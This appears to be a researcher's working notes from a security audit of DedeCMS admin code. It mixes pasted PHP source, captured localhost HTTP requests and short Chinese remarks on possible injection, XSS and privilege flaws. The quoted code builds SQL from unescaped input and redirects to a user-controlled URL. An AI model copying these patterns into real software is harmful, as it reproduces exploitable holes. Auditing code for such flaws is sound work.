require_once(DEDEINC.'/memberlogin.class.php');
//获取登录状态
$cfg_ml = new MemberLogin();
if( $cfg_ml->M_Rank < $lv->Fields['corank'] )
{
$dsql->Execute('me' , "SELECT * FROM `#@__arcrank` ");
while($row = $dsql->GetObject('me'))
{
$memberTypes[$row->rank] = $row->membername;
}
$memberTypes[0] = "游客或没权限会员";
$msgtitle = "你没有权限浏览栏目:{$lv->Fields['typename']} !";
$moremsg = "这个栏目需要 <font color='red'>".$memberTypes[$lv->Fields['corank']]."</font> 才能访问,你目前是:<font color='red'>".$memberTypes[$cfg_ml->M_Rank]."</font> !";
include_once(DEDETEMPLATE.'/plus/view_msg_catalog.htm');
exit();
}
}
}
if($lv->IsError) ParamError();
$lv->Display();没有注入
php
//php5构造函数
function __construct($kptime = -1, $cache=FALSE)
{
global $dsql;
if($kptime==-1){
$this->M_KeepTime = 3600 * 24 * 7;
}else{
$this->M_KeepTime = $kptime;
}
$formcache = FALSE;
$this->M_ID = $this->GetNum(GetCookie("DedeUserID"));
$this->M_LoginTime = GetCookie("DedeLoginTime");
$this->fields = array();
$this->isAdmin = FALSE;
if(empty($this->M_ID))
{
$this->ResetUser();
}else{
$this->M_ID = intval($this->M_ID);
if ($cache)
{
$this->fields = GetCache($this->memberCache, $this->M_ID);
if( empty($this->fields) )
{
//没有
$this->fields = $dsql->GetOne("Select * From `#@__member` where mid='{$this->M_ID}' ");
} else {
$formcache = TRUE;
}
} else {
//没有
$this->fields = $dsql->GetOne("Select * From `#@__member` where mid='{$this->M_ID}' ");
}
if(is_array($this->fields)){
#api{{
if(defined('UC_API') && @include_once DEDEROOT.'/uc_client/client.php')
{
if($data = uc_get_user($this->fields['userid']))
{
if(uc_check_avatar($data[0]) && !strstr($this->fields['face'],UC_API))
{
$this->fields['face'] = UC_API.'/avatar.php?uid='.$data[0].'&size=middle';
$dsql->ExecuteNoneQuery("UPDATE `#@__member` SET `face`='".$this->fields['face']."' WHERE `mid`='{$this->M_ID}'");
}
}
}
#/aip}}
//间隔一小时更新一次用户登录时间
if(time() - $this->M_LoginTime > 3600)
{
//可能有
$dsql->ExecuteNoneQuery("update `#@__member` set logintime='".time()."',loginip='".GetIP()."' where mid='".$this->fields['mid']."';");
PutCookie("DedeLoginTime",time(),$this->M_KeepTime);
}
$this->M_LoginID = $this->fields['userid'];
$this->M_MbType = $this->fields['mtype'];
$this->M_Money = $this->fields['money'];
$this->M_UserName = FormatUsername($this->fields['uname']);
$this->M_Scores = $this->fields['scores'];
$this->M_Face = $this->fields['face'];
$this->M_Rank = $this->fields['rank'];
$this->M_Spacesta = $this->fields['spacesta'];
//没有
$sql = "Select titles From #@__scores where integral<={$this->fields['scores']} order by integral desc";
$scrow = $dsql->GetOne($sql);
$this->fields['honor'] = $scrow['titles'];
$this->M_Honor = $this->fields['honor'];
if($this->fields['matt']==10) $this->isAdmin = TRUE;
$this->M_UpTime = $this->fields['uptime'];
$this->M_ExpTime = $this->fields['exptime'];
$this->M_JoinTime = MyDate('Y-m-d',$this->fields['jointime']);
if($this->M_Rank>10 && $this->M_UpTime>0){
$this->M_HasDay = $this->Judgemember();
}
if( !$formcache )
{
SetCache($this->memberCache, $this->M_ID, $this->fields, 1800);
}
}else{
$this->ResetUser();
}
}
}
php
function GetNum($fnum){
$fnum = preg_replace("/[^0-9\.]/", '', $fnum);
return $fnum;
}
php
/**
* 获取用户真实地址
*
* @return string 返回用户ip
*/
if ( ! function_exists('GetIP'))
{
function GetIP()
{
static $realip = NULL;
if ($realip !== NULL)
{
return $realip;
}
if (isset($_SERVER))
{
if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
/* 取X-Forwarded-For中第x个非unknown的有效IP字符? */
foreach ($arr as $ip)
{
$ip = trim($ip);
if ($ip != 'unknown')
{
$realip = $ip;
break;
}
}
}
elseif (isset($_SERVER['HTTP_CLIENT_IP']))
{
$realip = $_SERVER['HTTP_CLIENT_IP'];
}
else
{
if (isset($_SERVER['REMOTE_ADDR']))
{
$realip = $_SERVER['REMOTE_ADDR'];
}
else
{
$realip = '0.0.0.0';
}
}
}
else
{
if (getenv('HTTP_X_FORWARDED_FOR'))
{
$realip = getenv('HTTP_X_FORWARDED_FOR');
}
elseif (getenv('HTTP_CLIENT_IP'))
{
$realip = getenv('HTTP_CLIENT_IP');
}
else
{
$realip = getenv('REMOTE_ADDR');
}
}
preg_match("/[\d\.]{7,15}/", $realip, $onlineip);
$realip = ! empty($onlineip[0]) ? $onlineip[0] : '0.0.0.0';
return $realip;
}
}没有注入
php
//调试
function __construct($typeid, $uppage=1)
{
//设置
global $dsql,$ftp;
$this->TypeID = $typeid;
$this->dsql = &$dsql;
$this->CrossID = '';
$this->IsReplace = false;
$this->IsError = false;
$this->dtp = new DedeTagParse();
$this->dtp->SetRefObj($this);
$this->dtp->SetNameSpace("dede", "{", "}");
$this->dtp2 = new DedeTagParse();
$this->dtp2->SetNameSpace("field","[","]");
$this->TypeLink = new TypeLink($typeid);
$this->upPageType = $uppage;
$this->ftp = &$ftp;
$this->remoteDir = '';
//是num总计结果
$this->TotalResult = is_numeric($this->TotalResult)? $this->TotalResult : "";
//判断错误
if(!is_array($this->TypeLink->TypeInfos))
{
$this->IsError = true;
}
//不是
if(!$this->IsError)
{
$this->ChannelUnit = new ChannelUnit($this->TypeLink->TypeInfos['channeltype']);
$this->Fields = $this->TypeLink->TypeInfos;
$this->Fields['id'] = $typeid;
$this->Fields['position'] = $this->TypeLink->GetPositionLink(true);
$this->Fields['title'] = preg_replace("/[<>]/", " / ", $this->TypeLink->GetPositionLink(false));
//设置一些全局参数的值
foreach($GLOBALS['PubFields'] as $k=>$v) $this->Fields[$k] = $v;
$this->Fields['rsslink'] = $GLOBALS['cfg_cmsurl']."/data/rss/".$this->TypeID.".xml";
//设置环境变量
SetSysEnv($this->TypeID,$this->Fields['typename'],0,'','list');
$this->Fields['typeid'] = $this->TypeID;
//获得交叉栏目ID
if($this->TypeLink->TypeInfos['cross']>0 && $this->TypeLink->TypeInfos['ispart']==0)
{
$selquery = '';
if($this->TypeLink->TypeInfos['cross']==1)
{
$selquery = "SELECT id,topid FROM `#@__arctype` WHERE typename LIKE '{$this->Fields['typename']}' AND id<>'{$this->TypeID}' AND topid<>'{$this->TypeID}' ";
}
else
{
$this->Fields['crossid'] = preg_replace('/[^0-9,]/', '', trim($this->Fields['crossid']));
if($this->Fields['crossid']!='')
{
$selquery = "SELECT id,topid FROM `#@__arctype` WHERE id in({$this->Fields['crossid']}) AND id<>{$this->TypeID} AND topid<>{$this->TypeID} ";
}
}
if($selquery!='')
{
$this->dsql->SetQuery($selquery);
$this->dsql->Execute();
while($arr = $this->dsql->GetArray())
{
$this->CrossID .= ($this->CrossID=='' ? $arr['id'] : ','.$arr['id']);
}
}
}
}//!error
}
php
<?php if(!defined('DEDEINC')) exit('Request Error!');
/**
* 文档列表类
*
* @version $Id: arc.listview.class.php 2 15:15 2010年7月7日Z tianya $
* @package DedeCMS.Libraries
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
require_once(DEDEINC.'/arc.partview.class.php');
require_once(DEDEINC.'/ftp.class.php');
helper('cache');
@set_time_limit(0);
php
//过滤用于搜索的字符串
function FilterSearch($keyword)
{
global $cfg_soft_lang;
if($cfg_soft_lang=='utf-8')
{
$keyword = preg_replace("/[\"\r\n\t\$\\><']/", '', $keyword);
if($keyword != stripslashes($keyword))
{
return '';
}
else
{
return $keyword;
}
}
else
{
$restr = '';
for($i=0;isset($keyword[$i]);$i++)
{
if(ord($keyword[$i]) > 0x80)
{
if(isset($keyword[$i+1]) && ord($keyword[$i+1]) > 0x40)
{
$restr .= $keyword[$i].$keyword[$i+1];
$i++;
}
else
{
$restr .= ' ';
}
}
else
{
if(preg_match("/[^0-9a-z@#\.]/",$keyword[$i]))
{
$restr .= ' ';
}
else
{
$restr .= $keyword[$i];
}
}
}
}
return $restr;
}2
php
<?php
$cfg_NotPrintHead='Y';
require_once(dirname(__FILE__).'/../include/common.inc.php');
require_once(DEDEINC.'/qrcode.class.php');
$action = isset($action)? $action : '';
$type = isset($type)? $type : '';
$id = (isset($id) && is_numeric($id)) ? $id : 0;
if ( !in_array($type,array('list','arc','index')) ) $url = "http://2v.dedecms.com";
if ( $action=='get_qrcode' )
{
if ( $type=='arc' )
{
$url = $cfg_basehost.$cfg_plus_dir.'/view.php?aid='.$id;
} elseif ( $type=='list' )
{
$url = $cfg_basehost.$cfg_plus_dir.'/list.php?tid='.$id;
}
if($id==0) $url = "http://2v.dedecms.com";
if ( $type=='index' ) $url = $cfg_basehost.$cfg_plus_dir.'/index.php';
header("Content-Type: image/png");
$params=array();
$params['data'] = $url;
$params['size'] = 6;
$qrcode = new DedeQrcode;
$qrcode->generate($params);
} else {
header("Content-Type: text/html; charset={$cfg_soft_lang}");
$dtp = new DedeTemplate();
$tplfile = DEDETEMPLATE.'/plus/qrcode.htm';
$dtp->LoadTemplate($tplfile);
$dtp->SetVar('id',$id);
$dtp->SetVar('type',$type);
$dtp->Display();
exit();
}太多了 内容(注入,越权,xss,文件包含修改
php
GET /dede/catalog_do.php?cid=1&dopost=listArchives HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_main.php
Cookie: menuitems=1_1%2C2_1%2C4_1%2C6_1%2C3_1%2C5_1; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781510727; DedeLoginTime__ckMd5=6a08ab93e9b82d93; lastCid=17; lastCid__ckMd5=c3c0697254656180; PHPSESSID=fkd4nmanosng3l7lnbsjmi6a0l; _csrf_name_63248f8b=e9f25d627db80db7c4882fffd5b6f2a0; _csrf_name_63248f8b__ckMd5=aa906259717f979b; ENV_GOBACK_URL=%2Fdede%2Fcontent_list.php%3Fchannelid%3D1%26cid%3D1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
php
$gurl = $row["addcon"];
else if($dopost=="listArchives")
{
//检查是否为空,不是空
if(!empty($gurl))
{
//调试
//检查审核状态及阅读权限(可以看文档)
//空的
if(empty($arcrank))
{
$arcrank = '';
}
//str_replace 是 PHP 中用于字符串替换的内置函数
$gurl = str_replace('..','',$gurl);
//跳转
header("location:{$gurl}?arcrank={$arcrank}&cid={$cid}");
exit();
}
if($cid>0)
{
//没有风险
$row = $dsql->GetOne("SELECT #@__arctype.typename,#@__channeltype.typename AS channelname,#@__channeltype.id,#@__channeltype.mancon FROM #@__arctype LEFT JOIN #@__channeltype on #@__channeltype.id=#@__arctype.channeltype WHERE #@__arctype.id='$cid'");
//赋值
$gurl = $row["mancon"];
$channelid = $row["id"];
$typename = $row["typename"];
$channelname = $row["channelname"];
//没有gurl
if($gurl=="")
{
ShowMsg("对不起,你指的栏目可能有误!","catalog_main.php");
exit();
}
}
//通道识别
//文章存在
else if($channelid>0)
{
//$channelid = empty($channelid) ? 0 : intval($channelid);
//没有
$row = $dsql->GetOne("SELECT typename,id,mancon FROM #@__channeltype WHERE id='$channelid'");
$gurl = $row["mancon"];
$channelid = $row["id"];
$typename = "";
$channelname = $row["typename"];
}
if(empty($gurl)) $gurl = 'content_list.php';
//跳转
header("location:{$gurl}?channelid={$channelid}&cid={$cid}");
exit();
}
php
GET /dede/content_list.php?channelid=1&cid=1 HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:855/dede/catalog_main.php
Connection: keep-alive
Cookie: menuitems=1_1%2C2_1%2C4_1%2C6_1%2C3_1%2C5_1; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781510727; DedeLoginTime__ckMd5=6a08ab93e9b82d93; lastCid=17; lastCid__ckMd5=c3c0697254656180; PHPSESSID=fkd4nmanosng3l7lnbsjmi6a0l; _csrf_name_63248f8b=e9f25d627db80db7c4882fffd5b6f2a0; _csrf_name_63248f8b__ckMd5=aa906259717f979b; ENV_GOBACK_URL=%2Fdede%2Fcontent_list.php%3Fchannelid%3D1%26cid%3D1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
php
require_once(dirname(__FILE__).'/config.php');
if(empty($dopost))
{
ShowMsg("对不起,请指定栏目参数!","catalog_main.php");
exit();
}
$cid = empty($cid) ? 0 : intval($cid);
$unittype = empty($unittype) ? 0 : intval($unittype);
$channelid = empty($channelid) ? 0 : intval($channelid);
/*--------------------------
//增加文档
function addArchives();
---------------------------*/
if($dopost=="addArchives")
{
//默认文章调用发布表单
if(empty($cid) && empty($channelid))
{
header("location:article_add.php");
exit();
}
if(!empty($channelid))
{
//根据模型调用发布表单
$row = $dsql->GetOne("SELECT addcon FROM #@__channeltype WHERE id='$channelid'");
}
else
{
//根据栏目调用发布表单
$row = $dsql->GetOne("SELECT ch.addcon FROM `#@__arctype` tp LEFT JOIN `#@__channeltype` ch ON ch.id=tp.channeltype WHERE tp.id='$cid' ");
}
$gurl = $row["addcon"];
if($gurl=="")
{
ShowMsg("对不起,你指的栏目可能有误!","catalog_main.php");
exit();
}
//跳转并传递参数
header("location:{$gurl}?channelid={$channelid}&cid={$cid}");
exit();
}
/*--------------------------
//管理文档
function listArchives();
---------------------------*/
else if($dopost=="listArchives")
{
if(!empty($gurl))
{
if(empty($arcrank))
{
$arcrank = '';
}
$gurl = str_replace('..','',$gurl);
header("location:{$gurl}?arcrank={$arcrank}&cid={$cid}");
exit();
}
if($cid>0)
{
$row = $dsql->GetOne("SELECT #@__arctype.typename,#@__channeltype.typename AS channelname,#@__channeltype.id,#@__channeltype.mancon FROM #@__arctype LEFT JOIN #@__channeltype on #@__channeltype.id=#@__arctype.channeltype WHERE #@__arctype.id='$cid'");
$gurl = $row["mancon"];
$channelid = $row["id"];
$typename = $row["typename"];
$channelname = $row["channelname"];
if($gurl=="")
{
ShowMsg("对不起,你指的栏目可能有误!","catalog_main.php");
exit();
}
}
else if($channelid>0)
{
$row = $dsql->GetOne("SELECT typename,id,mancon FROM #@__channeltype WHERE id='$channelid'");
$gurl = $row["mancon"];
$channelid = $row["id"];
$typename = "";
$channelname = $row["typename"];
}
if(empty($gurl)) $gurl = 'content_list.php';
header("location:{$gurl}?channelid={$channelid}&cid={$cid}");
exit();
}
php
<?php
/**
* 内容列表
* content_s_list.php、content_i_list.php、content_select_list.php
* 均使用本文件作为实际处理代码,只是使用的模板不同,如有相关变动,只需改本文件及相关模板即可
*
* @version $Id: content_list.php 1 14:31 2010年7月12日Z tianya $
* @package DedeCMS.Administrator
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
require_once(dirname(__FILE__).'/config.php');
require_once(DEDEINC.'/typelink.class.php');
require_once(DEDEINC.'/datalistcp.class.php');
require_once(DEDEADMIN.'/inc/inc_list_functions.php');
$cid = isset($cid) ? intval($cid) : 0;
$channelid = isset($channelid) ? intval($channelid) : 0;
$mid = isset($mid) ? intval($mid) : 0;
if(!isset($keyword)) $keyword = '';
if(!isset($flag)) $flag = '';
if(!isset($arcrank)) $arcrank = '';
if(!isset($dopost)) $dopost = '';
//检查权限许可,总权限
CheckPurview('a_List,a_AccList,a_MyList');
//栏目浏览许可
$userCatalogSql = '';
if(TestPurview('a_List'))
{
;
}
else if(TestPurview('a_AccList'))
{
if($cid==0 && $cfg_admin_channel == 'array')
{
$admin_catalog = join(',', $admin_catalogs);
$userCatalogSql = " arc.typeid IN($admin_catalog) ";
}
else
{
CheckCatalog($cid, '你无权浏览非指定栏目的内容!');
}
if(TestPurview('a_MyList')) $mid = $cuserLogin->getUserID();
}
$adminid = $cuserLogin->getUserID();
$maintable = '#@__archives';
setcookie('ENV_GOBACK_URL', $dedeNowurl, time()+3600, '/');
$tl = new TypeLink($cid);
//----------------------------------------
//在不指定排序条件和关键字的情况下直接统计微表
//----------------------------------------
if(empty($totalresult) && empty($keyword) && empty($orderby) && empty($flag))
{
$tinyQuerys = array();
if(!empty($userCatalogSql))
{
$tinyQuerys[] = str_replace('arc.', '', $userCatalogSql);
}
if(!empty($channelid) && empty($cid))
{
$tinyQuerys[] = " channel = '$channelid' ";
}
else
{
$tinyQuerys[] = " channel>0 ";
}
if(!empty($arcrank))
{
$tinyQuerys[] = " arcrank='$arcrank' ";
}
else
{
$tinyQuerys[] = " arcrank > -2 ";
}
if(!empty($mid))
{
$tinyQuerys[] = " mid='$mid' ";
}
if(!empty($cid))
{
$tinyQuerys[] = " typeid in(".GetSonIds($cid).") ";
}
if(count($tinyQuerys)>0)
{
$tinyQuery = "WHERE ".join(' AND ',$tinyQuerys);
}
// 缓存处理
$sql = "SELECT COUNT(*) AS dd FROM `#@__arctiny` $tinyQuery ";
$cachekey = md5($sql);
$arr = GetCache('listcache', $cachekey);
if (empty($arr))
{
$arr = $dsql->GetOne($sql);
SetCache('listcache', $cachekey, $arr);
}
$totalresult = $arr['dd'];
}
if($cid==0)
{
if($channelid==0)
{
$positionname = '所有栏目>';
}
else
{
$row = $tl->dsql->GetOne("SELECT id,typename,maintable FROM `#@__channeltype` WHERE id='$channelid'");
$positionname = $row['typename']." > ";
$maintable = $row['maintable'];
$channelid = $row['id'];
}
}
else
{
$positionname = str_replace($cfg_list_symbol," > ",$tl->GetPositionName())." > ";
}
//当选择的是单表模型栏目时,直接跳转到单表模型管理区
if(empty($channelid)
&& isset($tl->TypeInfos['channeltype']))
{
$channelid = $tl->TypeInfos['channeltype'];
}
if($channelid < -1 )
{
header("location:content_sg_list.php?cid=$cid&channelid=$channelid&keyword=$keyword");
exit();
}
// 栏目大于800则需要缓存数据
$optHash = md5($cid.$admin_catalogs.$channelid);
$optCache = DEDEDATA."/tplcache/inc_option_$optHash.inc";
$typeCount = 0;
if (file_exists($cache1)) require_once($cache1);
else $cfg_Cs = array();
$typeCount = count($cfg_Cs);
if ( $typeCount > 800)
{
if (file_exists($optCache))
{
$optionarr = file_get_contents($optCache);
} else {
$optionarr = $tl->GetOptionArray($cid, $admin_catalogs, $channelid);
file_put_contents($optCache, $optionarr);
}
} else {
$optionarr = $tl->GetOptionArray($cid, $admin_catalogs, $channelid);
}
$whereSql = empty($channelid) ? " WHERE arc.channel > 0 AND arc.arcrank > -2 " : " WHERE arc.channel = '$channelid' AND arc.arcrank > -2 ";
$flagsArr = '';
$dsql->Execute('f', 'SELECT * FROM `#@__arcatt` ORDER BY sortid ASC');
while($frow = $dsql->GetArray('f'))
{
$flagsArr .= ($frow['att']==$flag ? "<option value='{$frow['att']}' selected>{$frow['attname']}</option>\r\n" : "<option value='{$frow['att']}'>{$frow['attname']}</option>\r\n");
}
if(!empty($userCatalogSql))
{
$whereSql .= " AND ".$userCatalogSql;
}
if(!empty($mid))
{
$whereSql .= " AND arc.mid = '$mid' ";
}
if($keyword != '')
{
$whereSql .= " AND ( CONCAT(arc.title,arc.writer) LIKE '%$keyword%') ";
}
if($flag != '')
{
$whereSql .= " AND FIND_IN_SET('$flag', arc.flag) ";
}
if($cid != 0)
{
$whereSql .= ' AND arc.typeid IN ('.GetSonIds($cid).')';
}
if($arcrank != '')
{
$whereSql .= " AND arc.arcrank = '$arcrank' ";
$CheckUserSend = "<input type='button' class='coolbg np' onClick=\"location='catalog_do.php?cid=".$cid."&dopost=listArchives&gurl=content_list.php';\" value='所有文档' />";
}
else
{
$CheckUserSend = "<input type='button' class='coolbg np' onClick=\"location='catalog_do.php?cid=".$cid."&dopost=listArchives&arcrank=-1&gurl=content_list.php';\" value='稿件审核' />";
}
$orderby = empty($orderby) ? 'id' : preg_replace("#[^a-z0-9]#", "", $orderby);
$orderbyField = 'arc.'.$orderby;
$query = "SELECT arc.id,arc.typeid,arc.senddate,arc.flag,arc.ismake,
arc.channel,arc.arcrank,arc.click,arc.title,arc.color,arc.litpic,arc.pubdate,arc.mid
FROM `$maintable` arc
$whereSql
ORDER BY $orderbyField DESC";
if(empty($f) || !preg_match("#form#", $f)) $f = 'form1.arcid1';
//初始化
$dlist = new DataListCP();
$dlist->pageSize = 30;
//GET参数
$dlist->SetParameter('dopost', 'listArchives');
$dlist->SetParameter('keyword', $keyword);
if(!empty($mid)) $dlist->SetParameter('mid', $mid);
$dlist->SetParameter('cid', $cid);
$dlist->SetParameter('flag', $flag);
$dlist->SetParameter('orderby', $orderby);
$dlist->SetParameter('arcrank', $arcrank);
$dlist->SetParameter('channelid', $channelid);
$dlist->SetParameter('f', $f);
//模板
if(empty($s_tmplets)) $s_tmplets = 'templets/content_list.htm';
$dlist->SetTemplate(DEDEADMIN.'/'.$s_tmplets);
//查询
$dlist->SetSource($query);
//显示
$dlist->Display();
// echo $dlist->queryTime;
$dlist->Close();更改(xss,注入,空指针?)增加子类|更改一起的
dos?
php
GET /dede/catalog_edit.php?id=2 HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_main.php
Cookie: menuitems=1_1%2C2_1%2C4_1%2C6_1%2C3_1%2C5_1; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781510727; DedeLoginTime__ckMd5=6a08ab93e9b82d93; lastCid=1; lastCid__ckMd5=16f063afe3fbbf9a; PHPSESSID=fkd4nmanosng3l7lnbsjmi6a0l; _csrf_name_63248f8b=e9f25d627db80db7c4882fffd5b6f2a0; _csrf_name_63248f8b__ckMd5=aa906259717f979b; ENV_GOBACK_URL=%2Fdede%2Fcontent_list.php%3Fchannelid%3D1%26cid%3D1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
php
require_once(dirname(__FILE__)."/config.php");
require_once(DEDEINC."/typelink.class.php");
if(empty($dopost)) $dopost = '';
//检查是否存在是否为整数
$id = isset($id) ? intval($id) : 0;
//检查权限许可,权限字段
CheckPurview('t_Edit,t_AccEdit');
//检查栏目操作许可
CheckCatalog($id, '你无权更改本栏目!');
php
function CheckPurview($n)
{
if(!TestPurview($n))
{
ShowMsg("对不起,你没有权限执行此操作!<br/><br/><a href='javascript:history.go(-1);'>点击此返回上一页>></a>",'javascript:;');
exit();
}
}
php
/**
* 检验用户是否有权使用某功能,这个函数是一个回值函数
* CheckPurview函数只是对他回值的一个处理过程
*
* @access public
* @param string $n 功能名称
* @return mix 如果具有则返回TRUE
*/
function TestPurview($n)
{
$rs = FALSE;
// var $userPurview = '';
//获取
$purview = $GLOBALS['cuserLogin']->getPurview();
//过滤
if(preg_match('/admin_AllowAll/i',$purview))
{
return TRUE;
}
if($n=='')
{
return TRUE;
}
//不是空
if(!isset($GLOBALS['groupRanks']))
{
//存储
//PHP 的 explode() 函数完全支持中文,因为它基于字节操作且是二进制安全的。
,分割
$GLOBALS['groupRanks'] = explode(' ',$purview);
}
$ns = explode(',',$n);
foreach($ns as $n)
{
//只要找到一个匹配的权限,即可认为用户有权访问此页面
if($n=='')
{
continue;
}
//数组
if(in_array($n,$GLOBALS['groupRanks']))
{
//设置
$rs = TRUE; break;
}
}
return $rs;
}
php
POST /dede/catalog_edit.php HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 606
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_edit.php?id=1
Cookie: menuitems=1_1%2C2_1%2C4_1%2C6_1%2C3_1%2C5_1; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781510727; DedeLoginTime__ckMd5=6a08ab93e9b82d93; lastCid=1; lastCid__ckMd5=16f063afe3fbbf9a; PHPSESSID=fkd4nmanosng3l7lnbsjmi6a0l; _csrf_name_63248f8b=e9f25d627db80db7c4882fffd5b6f2a0; _csrf_name_63248f8b__ckMd5=aa906259717f979b; ENV_GOBACK_URL=%2Fdede%2Fcontent_list.php%3Fchannelid%3D1%26cid%3D1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
dopost=save&id=1&topid=0&issend=1&ishidden=0&channeltype=1&typename=%E5%85%88%E7%A7%A6%E4%B8%A4%E6%B1%89&sortrank=10&corank=0&typedir=%7Bcmspath%7D%2Fa%2Fxianqinlianghan&isdefault=1&defaultname=index.html&ispart=0&cross=0&crossid=&moresite=0&siteurl=&dfstyle=%7Bstyle%7D&tempindex=%7Bstyle%7D%2Findex_article.htm&templist=%7Bstyle%7D%2Flist_article.htm&temparticle=%7Bstyle%7D%2Farticle_article.htm&namerule=%7Btypedir%7D%2F%7BY%7D%2F%7BM%7D%7BD%7D%2F%7Baid%7D.html&namerule2=%7Btypedir%7D%2Flist_%7Btid%7D_%7Bpage%7D.html&seotitle=&keywords=&description=&content=%26nbsp%3B&imageField.x=41&imageField.y=20
php
if($dopost=="save")
{
$description = Html2Text($description,1);
$keywords = Html2Text($keywords,1);
$uptopsql = $smalltypes = '';
if(isset($smalltype) && is_array($smalltype)) $smalltypes = join(',',$smalltype);
if($topid==0)
{
$sitepath = $typedir;
$uptopsql = " ,siteurl='$siteurl',sitepath='$sitepath',ishidden='$ishidden' ";
}
if($ispart!=0) $cross = 0;
$upquery = "UPDATE `#@__arctype` SET
issend='$issend',
sortrank='$sortrank',
typename='$typename',
typedir='$typedir',
isdefault='$isdefault',
defaultname='$defaultname',
issend='$issend',
ishidden='$ishidden',
channeltype='$channeltype',
tempindex='$tempindex',
templist='$templist',
temparticle='$temparticle',
namerule='$namerule',
namerule2='$namerule2',
ispart='$ispart',
corank='$corank',
description='$description',
keywords='$keywords',
seotitle='$seotitle',
moresite='$moresite',
`cross`='$cross',
`content`='$content',
`crossid`='$crossid',
`smalltypes`='$smalltypes'
$uptopsql
WHERE id='$id' ";
if(!$dsql->ExecuteNoneQuery($upquery))
{
ShowMsg("保存当前栏目更改时失败,请检查你的输入资料是否存在问题!","-1");
exit();
}
//如果选择子栏目可投稿,更新顶级栏目为可投稿
if($topid>0 && $issend==1)
{
$dsql->ExecuteNoneQuery("UPDATE `#@__arctype` SET issend='$issend' WHERE id='$topid'; ");
}
$slinks = " id IN (".GetSonIds($id).")";
//修改顶级栏目时强制修改下级的多站点支持属性
if($topid==0 && preg_match("#,#", $slinks))
{
$upquery = "UPDATE `#@__arctype` SET moresite='$moresite', siteurl='$siteurl',sitepath='$sitepath',ishidden='$ishidden' WHERE 1=1 AND $slinks";
$dsql->ExecuteNoneQuery($upquery);
}
//更改子栏目属性
if(!empty($upnext))
{
$upquery = "UPDATE `#@__arctype` SET
issend='$issend',
defaultname='$defaultname',
channeltype='$channeltype',
tempindex='$tempindex',
templist='$templist',
temparticle='$temparticle',
namerule='$namerule',
namerule2='$namerule2',
ishidden='$ishidden'
WHERE 1=1 AND $slinks";
if(!$dsql->ExecuteNoneQuery($upquery))
{
ShowMsg("更改当前栏目成功,但更改下级栏目属性时失败!","-1");
exit();
}
}
UpDateCatCache();
ShowMsg("成功更改一个分类!","catalog_main.php");
exit();
}//End Save Action增加子类(逻辑漏洞,xss,SQL,任意文件上传(包括后缀),空指针。)
php
GET /dede/catalog_add.php?id=5 HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_main.php
